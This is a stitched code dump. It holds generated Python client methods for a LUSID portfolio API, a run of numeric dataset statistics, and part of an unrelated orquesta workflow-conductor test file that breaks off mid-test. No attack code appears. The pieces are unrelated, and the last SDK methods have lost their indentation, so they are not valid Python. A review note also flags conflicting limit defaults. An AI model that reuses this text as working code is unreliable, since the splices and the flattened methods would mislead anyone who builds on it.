    collection_formats = {}
    path_params = {}

    # Build the query string; only parameters actually supplied are sent.
    query_params = []
    for py_name, wire_name in (
        ('effective_at', 'effectiveAt'),
        ('as_at', 'asAt'),
        ('page', 'page'),
        ('start', 'start'),
        ('limit', 'limit'),
        ('filter', 'filter'),
        ('query', 'query'),
    ):
        if local_var_params.get(py_name) is not None:
            query_params.append((wire_name, local_var_params[py_name]))
    if local_var_params.get('property_keys') is not None:
        query_params.append(('propertyKeys', local_var_params['property_keys']))  # noqa: E501
        collection_formats['propertyKeys'] = 'multi'

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),
        'Accept-Encoding': "gzip, deflate, br",
    }

    # Authentication setting
    auth_settings = ['oauth2']

    response_types_map = {
        200: "ResourceListOfPortfolio",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def list_portfolios_for_scope(self, scope, **kwargs):  # noqa: E501
    """ListPortfoliosForScope: List portfolios for scope  # noqa: E501

    List all the portfolios in a particular scope.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.list_portfolios_for_scope(scope, async_req=True)
    >>> result = thread.get()

    :param scope: The scope whose portfolios to list. (required)
    :type scope: str
    :param effective_at: The effective datetime or cut label at which to list
        the portfolios. Defaults to the current LUSID system datetime.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the portfolios. Defaults
        to the latest version of each portfolio.
    :type as_at: datetime
    :param page: Pagination token returned from the previous call. If a token
        is supplied, the filter, effectiveAt and asAt fields must match the
        original request, and start must not be set.
    :type page: str
    :param start: When paginating, skip this number of results.
    :type start: int
    :param limit: When paginating, limit the results to this number.
        NOTE(review): upstream docs state a default of 65,535, but client-side
        validation caps limit at 5000 — confirm against the API spec.
    :type limit: int
    :param filter: Expression to filter the results, for example
        "type eq 'Buy'". See
        https://support.lusid.com/knowledgebase/article/KA-01914.
    :type filter: str
    :param property_keys: Property keys from the 'Portfolio' domain to
        decorate onto each portfolio, in the format {domain}/{scope}/{code}.
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: ResourceListOfPortfolio
    """
    # This convenience variant always returns just the deserialized body;
    # use the *_with_http_info sibling for status code and headers too.
    kwargs['_return_http_data_only'] = True
    return self.list_portfolios_for_scope_with_http_info(scope, **kwargs)  # noqa: E501
def list_portfolios_for_scope_with_http_info(self, scope, **kwargs):  # noqa: E501
    """ListPortfoliosForScope: List portfolios for scope  # noqa: E501

    List all the portfolios in a particular scope.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.list_portfolios_for_scope_with_http_info(scope, async_req=True)
    >>> result = thread.get()

    :param scope: The scope whose portfolios to list. (required)
    :type scope: str
    :param effective_at: The effective datetime or cut label at which to list
        the portfolios. Defaults to the current LUSID system datetime.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the portfolios. Defaults
        to the latest version of each portfolio.
    :type as_at: datetime
    :param page: Pagination token returned from the previous call. If a token
        is supplied, the filter, effectiveAt and asAt fields must match the
        original request, and start must not be set.
    :type page: str
    :param start: When paginating, skip this number of results.
    :type start: int
    :param limit: When paginating, limit the results to this number.
        NOTE(review): upstream docs state a default of 65,535, but the
        client-side validation below caps limit at 5000 — confirm against
        the API spec.
    :type limit: int
    :param filter: Expression to filter the results, for example
        "type eq 'Buy'". See
        https://support.lusid.com/knowledgebase/article/KA-01914.
    :type filter: str
    :param property_keys: Property keys from the 'Portfolio' domain to
        decorate onto each portfolio, in the format {domain}/{scope}/{code}.
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: return the response data without status
        code and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this single
        request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: tuple(ResourceListOfPortfolio, status_code(int), headers(HTTPHeaderDict))
    """
    known_params = [
        'scope',
        'effective_at',
        'as_at',
        'page',
        'start',
        'limit',
        'filter',
        'property_keys',
        # framework options accepted by every endpoint
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_portfolios_for_scope" % key
            )
    local_var_params = dict(kwargs, scope=scope)

    if self.api_client.client_side_validation:
        # `scope` must be a 1-64 character string of [a-zA-Z0-9-_].
        if len(scope) > 64:
            raise ApiValueError("Invalid value for parameter `scope` when calling `list_portfolios_for_scope`, length must be less than or equal to `64`")  # noqa: E501
        if len(scope) < 1:
            raise ApiValueError("Invalid value for parameter `scope` when calling `list_portfolios_for_scope`, length must be greater than or equal to `1`")  # noqa: E501
        if not re.search(r'^[a-zA-Z0-9\-_]+$', scope):
            raise ApiValueError("Invalid value for parameter `scope` when calling `list_portfolios_for_scope`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
        if 'limit' in local_var_params and local_var_params['limit'] > 5000:
            raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios_for_scope`, must be a value less than or equal to `5000`")  # noqa: E501
        if 'limit' in local_var_params and local_var_params['limit'] < 1:
            raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios_for_scope`, must be a value greater than or equal to `1`")  # noqa: E501

    collection_formats = {}
    path_params = {'scope': scope}

    # Build the query string; only parameters actually supplied are sent.
    query_params = []
    for py_name, wire_name in (
        ('effective_at', 'effectiveAt'),
        ('as_at', 'asAt'),
        ('page', 'page'),
        ('start', 'start'),
        ('limit', 'limit'),
        ('filter', 'filter'),
    ):
        if local_var_params.get(py_name) is not None:
            query_params.append((wire_name, local_var_params[py_name]))
    if local_var_params.get('property_keys') is not None:
        query_params.append(('propertyKeys', local_var_params['property_keys']))  # noqa: E501
        collection_formats['propertyKeys'] = 'multi'

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),
        'Accept-Encoding': "gzip, deflate, br",
    }

    # Authentication setting
    auth_settings = ['oauth2']

    response_types_map = {
        200: "ResourceListOfPortfolio",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def update_portfolio(self, scope, code, update_portfolio_request, **kwargs):  # noqa: E501
    """UpdatePortfolio: Update portfolio  # noqa: E501

    Update the definition of a particular portfolio. Note that not all
    elements of a portfolio definition are modifiable due to the potential
    implications for data already stored.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.update_portfolio(scope, code, update_portfolio_request, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this
        uniquely identifies the portfolio. (required)
    :type code: str
    :param update_portfolio_request: The updated portfolio definition. (required)
    :type update_portfolio_request: UpdatePortfolioRequest
    :param effective_at: The effective datetime or cut label at which to
        update the definition. Defaults to the current LUSID system datetime.
    :type effective_at: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: Portfolio
    """
    # This convenience variant always returns just the deserialized body;
    # use the *_with_http_info sibling for status code and headers too.
    kwargs['_return_http_data_only'] = True
    return self.update_portfolio_with_http_info(scope, code, update_portfolio_request, **kwargs)  # noqa: E501
def update_portfolio_with_http_info(self, scope, code, update_portfolio_request, **kwargs):  # noqa: E501
    """UpdatePortfolio: Update portfolio  # noqa: E501

    Update the definition of a particular portfolio. Note that not all
    elements of a portfolio definition are modifiable due to the potential
    implications for data already stored.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.update_portfolio_with_http_info(scope, code, update_portfolio_request, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this
        uniquely identifies the portfolio. (required)
    :type code: str
    :param update_portfolio_request: The updated portfolio definition. (required)
    :type update_portfolio_request: UpdatePortfolioRequest
    :param effective_at: The effective datetime or cut label at which to
        update the definition. Defaults to the current LUSID system datetime.
    :type effective_at: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: return the response data without status
        code and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this single
        request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: tuple(Portfolio, status_code(int), headers(HTTPHeaderDict))
    """
    known_params = [
        'scope',
        'code',
        'update_portfolio_request',
        'effective_at',
        # framework options accepted by every endpoint
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_portfolio" % key
            )

    if self.api_client.client_side_validation:
        if update_portfolio_request is None:
            raise ApiValueError("Missing the required parameter `update_portfolio_request` when calling `update_portfolio`")  # noqa: E501
        # Both path identifiers share the same 1-64 char [a-zA-Z0-9-_] rule.
        for name, value in (('scope', scope), ('code', code)):
            if len(value) > 64:
                raise ApiValueError("Invalid value for parameter `%s` when calling `update_portfolio`, length must be less than or equal to `64`" % name)  # noqa: E501
            if len(value) < 1:
                raise ApiValueError("Invalid value for parameter `%s` when calling `update_portfolio`, length must be greater than or equal to `1`" % name)  # noqa: E501
            if not re.search(r'^[a-zA-Z0-9\-_]+$', value):
                raise ApiValueError("Invalid value for parameter `%s` when calling `update_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`" % name)  # noqa: E501

    collection_formats = {}
    path_params = {'scope': scope, 'code': code}

    query_params = []
    effective_at = kwargs.get('effective_at')
    if effective_at is not None:
        query_params.append(('effectiveAt', effective_at))

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),
        'Accept-Encoding': "gzip, deflate, br",
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']),  # noqa: E501
        # SDK identification headers
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3648',
    }

    # Authentication setting
    auth_settings = ['oauth2']

    response_types_map = {
        200: "Portfolio",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=update_portfolio_request,
        post_params=[],
        files={},
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=kwargs.get('_request_auth'))
def upsert_portfolio_properties(self, scope, code, request_body, **kwargs):  # noqa: E501
    """UpsertPortfolioProperties: Upsert portfolio properties  # noqa: E501

    Create or update one or more properties for a particular portfolio. A
    property is updated if it already exists and created if it does not. All
    properties must be from the 'Portfolio' domain. Properties are valid from
    their effectiveFrom datetime until their effectiveUntil datetime;
    omitting effectiveUntil makes a property valid indefinitely, or until
    the next effectiveFrom datetime of the property.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.upsert_portfolio_properties(scope, code, request_body, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this
        uniquely identifies the portfolio. (required)
    :type code: str
    :param request_body: The properties to be created or updated, keyed by
        their unique property key in the format {domain}/{scope}/{code},
        e.g. 'Portfolio/Manager/Id'. (required)
    :type request_body: dict(str, ModelProperty)
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: PortfolioProperties
    """
    # This convenience variant always returns just the deserialized body;
    # use the *_with_http_info sibling for status code and headers too.
    kwargs['_return_http_data_only'] = True
    return self.upsert_portfolio_properties_with_http_info(scope, code, request_body, **kwargs)  # noqa: E501
def upsert_portfolio_properties_with_http_info(self, scope, code, request_body, **kwargs):  # noqa: E501
    """UpsertPortfolioProperties: Upsert portfolio properties  # noqa: E501

    Create or update one or more properties for a particular portfolio. A
    property is updated if it already exists and created if it does not. All
    properties must be from the 'Portfolio' domain. Properties are valid from
    their effectiveFrom datetime until their effectiveUntil datetime;
    omitting effectiveUntil makes a property valid indefinitely, or until
    the next effectiveFrom datetime of the property.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.upsert_portfolio_properties_with_http_info(scope, code, request_body, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this
        uniquely identifies the portfolio. (required)
    :type code: str
    :param request_body: The properties to be created or updated, keyed by
        their unique property key in the format {domain}/{scope}/{code},
        e.g. 'Portfolio/Manager/Id'. (required)
    :type request_body: dict(str, ModelProperty)
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: return the response data without status
        code and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this single
        request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: tuple(PortfolioProperties, status_code(int), headers(HTTPHeaderDict))
    """
    known_params = [
        'scope',
        'code',
        'request_body',
        # framework options accepted by every endpoint
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upsert_portfolio_properties" % key
            )

    if self.api_client.client_side_validation:
        if request_body is None:
            raise ApiValueError("Missing the required parameter `request_body` when calling `upsert_portfolio_properties`")  # noqa: E501
        # Both path identifiers share the same 1-64 char [a-zA-Z0-9-_] rule.
        for name, value in (('scope', scope), ('code', code)):
            if len(value) > 64:
                raise ApiValueError("Invalid value for parameter `%s` when calling `upsert_portfolio_properties`, length must be less than or equal to `64`" % name)  # noqa: E501
            if len(value) < 1:
                raise ApiValueError("Invalid value for parameter `%s` when calling `upsert_portfolio_properties`, length must be greater than or equal to `1`" % name)  # noqa: E501
            if not re.search(r'^[a-zA-Z0-9\-_]+$', value):
                raise ApiValueError("Invalid value for parameter `%s` when calling `upsert_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`" % name)  # noqa: E501

    collection_formats = {}
    path_params = {'scope': scope, 'code': code}
    query_params = []

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['text/plain', 'application/json', 'text/json']),
        'Accept-Encoding': "gzip, deflate, br",
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']),  # noqa: E501
        # SDK identification headers
        'X-LUSID-SDK-Language': 'Python',
        'X-LUSID-SDK-Version': '0.11.3648',
    }

    # Authentication setting
    auth_settings = ['oauth2']

    response_types_map = {
        200: "PortfolioProperties",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/properties', 'POST',
        path_params,
        query_params,
        header_params,
        body=request_body,
        post_params=[],
        files={},
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=kwargs.get('_request_auth'))
def upsert_portfolio_returns(self, scope, code, return_scope, return_code, performance_return, **kwargs): # noqa: E501
"""[EARLY ACCESS] UpsertPortfolioReturns: Upsert Returns # noqa: E501
Update or insert returns into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upsert_portfolio_returns(scope, code, return_scope, return_code, performance_return, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param performance_return: This contains the Returns which need to be upsert. (required)
:type performance_return: list[PerformanceReturn]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: UpsertReturnsResponse
"""
kwargs['_return_http_data_only'] = True
return self.upsert_portfolio_returns_with_http_info(scope, code, return_scope, return_code, performance_return, **kwargs) # noqa: E501
def upsert_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, performance_return, **kwargs): # noqa: E501
"""[EARLY ACCESS] UpsertPortfolioReturns: Upsert Returns # noqa: E501
Update or insert returns into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upsert_portfolio_returns_with_http_info(scope, code, return_scope, return_code, performance_return, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param performance_return: This contains the Returns which need to be upsert. (required)
:type performance_return: list[PerformanceReturn]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(UpsertReturnsResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'performance_return'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method upsert_portfolio_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'performance_return' is set
if self.api_client.client_side_validation and ('performance_return' not in local_var_params or # noqa: E501
local_var_params['performance_return'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `performance_return` when calling `upsert_portfolio_returns`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
if 'return_scope' in local_var_params:
path_params['returnScope'] = local_var_params['return_scope'] # noqa: E501
if 'return_code' in local_var_params:
path_params['returnCode'] = local_var_params['return_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'performance_return' in local_var_params:
body_params = local_var_params['performance_return']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3648'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "UpsertReturnsResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 56.226116
| 539
| 0.625425
| 16,039
| 134,774
| 5.042085
| 0.025874
| 0.043823
| 0.07219
| 0.025918
| 0.984172
| 0.9805
| 0.976221
| 0.974614
| 0.970879
| 0.967874
| 0
| 0.017197
| 0.296734
| 134,774
| 2,396
| 540
| 56.249583
| 0.836024
| 0.466507
| 0
| 0.769643
| 1
| 0.045536
| 0.258753
| 0.062374
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024107
| false
| 0
| 0.004464
| 0
| 0.052679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acd36f6ba3cfc6033f61428d25abd2fa07a4886f
| 69,644
|
py
|
Python
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/test_workflow_conductor_with_items.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
orquesta/tests/unit/conducting/test_workflow_conductor_with_items.py
|
batk0/orquesta
|
f03f3f2f3820bf111a9277f4f6c5d6c83a89d004
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta import events
from orquesta.specs import native as specs
from orquesta import states
from orquesta.tests.unit import base
class WorkflowConductorWithItemsTest(base.WorkflowConductorWithItemsTest):
def test_empty_items_list(self):
wf_def = """
version: 1.0
vars:
- xs: []
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': []}
task_action_specs = []
mock_ac_ex_states = []
expected_task_states = [states.SUCCEEDED]
expected_workflow_states = [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
# Assert the workflow output is correct.
expected_output = {'items': []}
self.assertDictEqual(conductor.get_workflow_output(), expected_output)
def test_basic_items_list(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED] * 4
expected_task_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
# Assert the workflow output is correct.
expected_output = {'items': task_ctx['xs']}
self.assertDictEqual(conductor.get_workflow_output(), expected_output)
    def test_basic_items_list_with_concurrency(self):
        # Run a with-items task over four items but limit the number of
        # concurrently dispatched action executions to two.
        wf_def = """
        version: 1.0

        vars:
          - concurrency: 2
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with:
              items: <% ctx(xs) %>
              concurrency: <% ctx(concurrency) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        concurrency = 2

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum'], 'concurrency': 2}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # All four items succeed; the task and workflow stay running until
        # the last item completes.
        mock_ac_ex_states = [states.SUCCEEDED] * 4
        expected_task_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
        expected_workflow_states = [states.RUNNING] * 3 + [states.SUCCEEDED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states,
            concurrency=concurrency
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow succeeded.
        self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_multiple_items_list(self):
wf_def = """
version: 1.0
vars:
- xs:
- foo
- fu
- marco
- ys:
- bar
- bar
- polo
tasks:
task1:
with: x, y in <% zip(ctx(xs), ctx(ys)) %>
action: core.echo message=<% item(x) + item(y) %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['foo', 'fu', 'marco'], 'ys': ['bar', 'bar', 'polo']}
task_action_specs = [
